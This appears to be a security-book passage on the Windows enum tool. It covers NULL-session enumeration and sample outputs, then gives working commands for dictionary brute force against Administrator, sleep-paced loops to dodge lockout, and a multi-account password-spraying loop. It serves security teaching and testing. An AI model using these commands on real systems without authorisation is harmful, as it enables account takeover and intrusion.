Enum

Enum culls a target Windows NT, 2000, or XP system for information about users, groups, shares, and basic system information. One of the best aspects about enum is that it comes with source code. So if you find a bit of functionality missing, you can break out your copy of Stroustrup’s book on C++ and open up enum.cpp in vi. emum.cpp is available at http://razor.bindview.com/tools/desc/enum_readme.html.

Implementation

Even though enum comes with source code, a ready-to-go binary is also included. It uses native Windows functions so you do not have to carry any extra dynamic-link libraries (DLLs) with the tool. Whenever you see TCP port 139 or 445 open on a Windows system, unleash enum:

C:\>enum.exe Usage:  enum.exe  [switches]  [hostname|ip]   

The table explains the various options:

The first seven options return a wealth of information about the target, provided the IPC$ share is available over port 139 or port 445. By default, it establishes connections over a NULL share—basically, an anonymous user. You can specify all seven options at once, but we’ll break them down a bit to make the output more readable. Combine the –UPG options to gather user-related information:

C:\>enum –UPG 192.168.0.139 server: 192.168.0.139 setting up session... success. password policy:   min length: none   min age: none   max age: 42 days   lockout threshold: none   lockout duration: 30 mins   lockout reset: 30 mins getting user list (pass 1, index 0)... success, got 5.   Administrator  Guest  IUSR_ALPHA  IWAM_ALPHA   TsInternetUser Group: Administrators ALPHA\Administrator Group: Guests ALPHA\Guest ALPHA\TsInternetUser ALPHA\IUSR_ALPHA ALPHA\IWAM_ALPHA Group: Power Users cleaning up... success.

The lines in boldface type suggest that this system would be an excellent target for password guessing. No lockout threshold has been set for incorrect passwords. We also infer from the user list that Internet Information Server (IIS) (IUSR_ALPHA, IWAM_ALPHA) and Terminal Services (TsInternetUser) are installed on the system.

Combine the –MNS options to gather server-related options:

C:\>enum.exe -MNS 10.192.0.139 server: 10.192.0.139 setting up session... success. getting namelist (pass 1)... got 5, 0 left:   Administrator  Guest  IUSR_ALPHA  IWAM_ALPHA   TsInternetUser enumerating shares (pass 1)... got 3 shares, 0 left:   IPC$  ADMIN$  C$ getting machine list (pass 1, index 0)... success, got 0. cleaning up... success.

These options also return a list of users, but they also reveal file shares. In this case, only the default shares are present; however, we can make an educated guess that the system has only one hard drive: C$. Remember that it also had IIS installed. This implies that the web document root is stored on the same drive letter as C:\Winnt\System32. That’s a great combination for us to exploit some IIS-specific issues, such as the Unicode directory traversal vulnerability.

Finally, use the –L option to enumerate the Local Security Authority (LSA) information. This returns data about the system and its relationship to a domain:

C:\>enum.exe -L 10.192.0.139 server: 10.192.0.139 setting up session... success. opening lsa policy... success. server role: 3 [primary (unknown)] names:   netbios: ALPHA   domain: MOONBASE quota:   paged pool limit: 33554432   nonpaged pool limit: 1048576   min work set size: 65536   max work set size: 251658240   pagefile limit: 0   time limit: 0 trusted domains:   indeterminate netlogon done by a PDC server cleaning up... success.

We now know that the system name is ALPHA and it belongs to the domain MOONBASE.

You may often find that the Administrator account has no password. This happens when the administrator flies through the install process and forgets to assign a strong password, or when the administrator assumes that the domain administrator account’s password is strong enough. Use the –u and –p options to specify a particular user’s credentials:

C:\>enum –UMNSPGL –u administrator –p "" 192.168.0.184

Enum used to be one of the few tools that enabled brute-force password guessing against Windows systems; however, you may be more interested in Hydra (Chapter 8) for brute-force testing.

Enum's username and password feature lends itself to a rudimentary brute-force password guessing tool, but it also includes the –f option to make things easy. The –P option returns the password policy information of the target. This includes the lockout period and number of invalid logins before Windows locks the account. You should always take a look at this before trying to break an account:

C:\>enum –P 192.168.0.36 server: 192.168.0.36 setting up session... success. password policy:    min length: 7    min age: 2 days    max age: 42 days    lockout threshold: 5    lockout duration: 30 mins    lockout reset: 30 mins    cleaning up... success.

Use this information to customize a brute-force attack.

Note that, by design, the Administrator account cannot be locked by failed password attempts. Use passprop/adminlockout from the Resource Kit if you want to enforce the lockout policy for the administrator. If no account lockouts are applied, the test is simple; tailor the dictionary to the target. In this example, no passwords can be shorter than seven characters (although the administrator can always set an arbitrary password), so you would remove words with six characters or less from your dictionary.

C:\>enum –D –u Administrator –f dict.txt

This launches a relatively speedy attack against the Administrator account. If you try to break any other user's account, you'll have to pay more attention to the lockout threshold. An approach that works around a limit of five invalid logins and a period of 30 minutes requires Cygwin or the Resource Kit tools (for the sleep function):

C:\>for /F %%p in (dict.txt) do enum –u Istari –p %%p –M 192.168.0.36  output.txt && sleep 180s

As you can see, lockout policies severely impact a brute-force attack. However, we can alter our methodology by targeting multiple user accounts to speed up the process. Use the –G option to identify users in the Administrator group or any particular group you wish to target:

C:\>enum –G 192.168.0.36

Then launch the brute force against both accounts. Place the account names in a file called users.txt. If you have a large enough user base to test, you won't have to worry about locking out an account.

C:\>for /F %%p in (dict.txt) do for /F %%u in (users.txt) do enum –u %%u –p %%p –M 192.168.0.36 >> output.txt

With this technique, the users.txt file should be large and the pass.txt file should be small. This roots out accounts with trivial passwords such as password, changeme, or pass123. For a more robust brute force tool, check out THC-Hydra in Chapter 8.